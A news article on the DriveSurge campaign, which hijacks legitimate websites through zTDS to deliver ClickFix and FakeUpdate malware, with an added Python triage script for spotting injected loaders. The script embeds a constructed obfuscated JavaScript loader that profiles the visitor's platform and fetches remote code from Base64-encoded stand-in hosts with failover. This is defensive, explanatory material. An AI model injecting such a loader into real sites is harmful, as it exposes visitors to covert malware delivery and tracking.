Threat actors have compromised thousands of websites for the purpose of engineering industrialized ClickFix and FakeUpdate attacks in an organized malware delivery operation aimed at selling initial access to systems. The campaign targets not only Windows users but also macOS systems and appears to be a mature cybercriminal ecosystem that avoided detection for nearly a year.
The operation — dubbed DriveSurge by the researchers at Silent Push who discovered the activity — appears to function as an initial access broker (IAB) "using a pay-per-install (PPI) model to supply downstream threat actors with high-quality victim leads," according to a recently published report.
The operation's primary weapon is a traffic distribution system (TDS), specifically an open source variant called zTDS. zTDS has been in use since at least 2015 and is publicly available at ztds[.]info. According to Silent Push, this system is the foundational engine of the activity: the compromised websites load zTDS domains, which route visitors on to the ClickFix and FakeUpdate pages.
"Using zTDS, DriveSurge hijacks thousands of legitimate, high-reputation websites and silently redirects visitors to malware, unbeknownst to the sites' owners or their visitors," the report reads.
Targeted Payload Delivery
DriveSurge's infrastructure is extensive, the researchers found: payload repositories, PowerShell downloaders, staging servers, and multiple fallback domains designed to keep the operation running if portions of it are taken down. The JavaScript injected into compromised sites is obfuscated to evade detection, using Base64 encoding, dynamic URL construction, and failover logic to retrieve the malicious code even when one delivery domain is unavailable.
One notable part of the operation's strategy is an obfuscated payload hosted on its infrastructure that performs extensive victim profiling, according to the report. The malware identifies operating system characteristics, communicates with attacker-controlled endpoints, and dynamically builds a payload tailored to the victim's platform.
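The loader traits the report describes (Base64-encoded hostnames, a URL assembled at runtime with atob(), an onerror handler that falls through to the next domain, and navigator.* reads used for platform profiling) are all visible in page source, which makes them a practical starting point for site owners and responders auditing a suspected compromise. The triage script below is an added example written for this article, not code from Silent Push or from the DriveSurge operators. The injected and benign snippets it scans are constructed for illustration, the hostnames are reserved example domains, and the scoring thresholds are assumptions, not indicators published in the report.

```python
import base64
import re
from typing import Dict, List

# Constructed sample of an injected loader in the style described in the
# report: Base64 hostnames, dynamic URL assembly, failover across domains,
# and platform fingerprinting. Illustrative only, not a real sample.
INJECTED_SAMPLE = """
<script>
var _h=["Y2RuLWZhbGxiYWNrLTEuZXhhbXBsZS5uZXQ=", "c3RhdGljLmV4YW1wbGUub3Jn", "YXNzZXRzLmV4YW1wbGUuY29t"];
var _p=navigator.platform+"|"+navigator.userAgent;
(function _t(i){if(i>=_h.length)return;var s=document.createElement("script");
s.src="https://"+atob(_h[i])+"/j/"+btoa(_p);s.onerror=function(){_t(i+1)};document.head.appendChild(s)})(0);
</script>
"""

# Constructed benign sample: an ordinary tag with a plain-text script URL.
BENIGN_SAMPLE = """
<script src="https://analytics.example.com/tag.js" async></script>
<script>window.dataLayer = window.dataLayer || [];</script>
"""

B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{12,}={0,2})"')
HOSTNAME = re.compile(r'^(?:[a-z0-9-]{1,63}\.)+[a-z]{2,}$', re.I)
# Assumed profiling indicators: properties a loader reads to pick a payload.
FINGERPRINT_APIS = ("navigator.platform", "navigator.userAgent",
                    "navigator.language", "screen.width")
# Assumed failover indicators: a handler that can retry with the next host.
FAILOVER_HINTS = ("onerror", "catch(")


def decode_b64_hosts(text: str) -> List[str]:
    """Return every quoted Base64 literal that decodes to a hostname or URL."""
    hosts = []
    for m in B64_LITERAL.finditer(text):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
            continue
        # Strip an optional scheme and path so "https://host/x" and "host" both match.
        candidate = decoded.split("://", 1)[-1].split("/", 1)[0]
        if HOSTNAME.match(candidate):
            hosts.append(candidate)
    return hosts


def triage_script(text: str) -> Dict[str, object]:
    """Score an HTML/JS blob for the loader traits named in the report.

    One point each for: encoded hosts, a URL built from atob() output,
    failover logic across more than one host, and profiling API reads.
    The threshold of 3 is an assumed value for this example.
    """
    hosts = decode_b64_hosts(text)
    dynamic_url = bool(re.search(r'https?://["\']\s*\+\s*atob\(', text))
    failover = len(hosts) > 1 and any(h in text for h in FAILOVER_HINTS)
    fingerprint = [api for api in FINGERPRINT_APIS if api in text]
    score = sum([bool(hosts), dynamic_url, failover, bool(fingerprint)])
    return {
        "hosts": hosts,               # decoded delivery domains, usable as block-list candidates
        "dynamic_url": dynamic_url,
        "failover": failover,
        "fingerprint_apis": fingerprint,
        "score": score,
        "suspicious": score >= 3,
    }


def scan_pages(pages: Dict[str, str]) -> Dict[str, Dict[str, object]]:
    """Run triage over a name -> source mapping and keep only flagged pages."""
    return {name: r for name, r in ((n, triage_script(src)) for n, src in pages.items())
            if r["suspicious"]}


if __name__ == "__main__":
    for name, result in scan_pages({"index.html": INJECTED_SAMPLE,
                                    "about.html": BENIGN_SAMPLE}).items():
        print(name, result)
```

The decoded hostnames are the most useful output: they can be compared against the site's legitimate third-party script sources and fed to a block list, while the other traits mainly serve to keep a plain Base64 string (a data URI, a token) from triggering on its own.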
The activity is unique for its scope, Waseem Ahmed, head of engineering for Secure.com, tells Dark Reading. Noting that "ClickFix and fake-update pop-ups have been the way in for a while now," he says what's different with DriveSurge "is the scale and the business behind it."
"[It's] the crew quietly running this across thousands of hacked-but-legitimate sites, then selling that access to whoever wants it," he says. "Think less burglar, more the guy selling keys to burglars."